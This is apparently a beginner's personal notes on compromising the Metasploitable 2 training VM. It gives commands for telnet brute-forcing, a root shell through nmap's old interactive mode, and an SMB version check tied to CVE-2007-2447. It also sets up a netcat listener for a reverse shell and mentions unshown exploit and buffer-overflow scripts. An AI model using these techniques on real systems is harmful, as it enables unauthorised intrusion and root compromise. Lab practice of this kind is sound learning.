Various methods to own the Metasploitable 2 box
Just started penetration testing, below are various methods that I am using to own the box. You can see this more like my personal guidlines and what worked for me rather than a guide/solutions to own the box
nmap -sV 192.168.1.13
#user:user - Valid credentials
#|_ Statistics: Performed 2178 guesses in 603 seconds, average tps: 3
#not the best way but it works
nmap --script telnet-brute 192.168.1.13
On older versions this work
user@metasploitable:~$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
sh-3.2#
Crosscheck the smb version with metasploit
use scanner/smb/smb_version #3.0.20
This version is vulnerable to "username map script". Just for fun I created a python script that connects to the smb and drops a reverse ncat paylod
https://www.samba.org/samba/security/CVE-2007-2447.html
#open nc connection on LHOST
nc -vnlp 1337
#config & run, msfvenom can be used to get a hex of any reverse shell like nc
python smb_shell.py #root
BufferOverflow python script tftp.py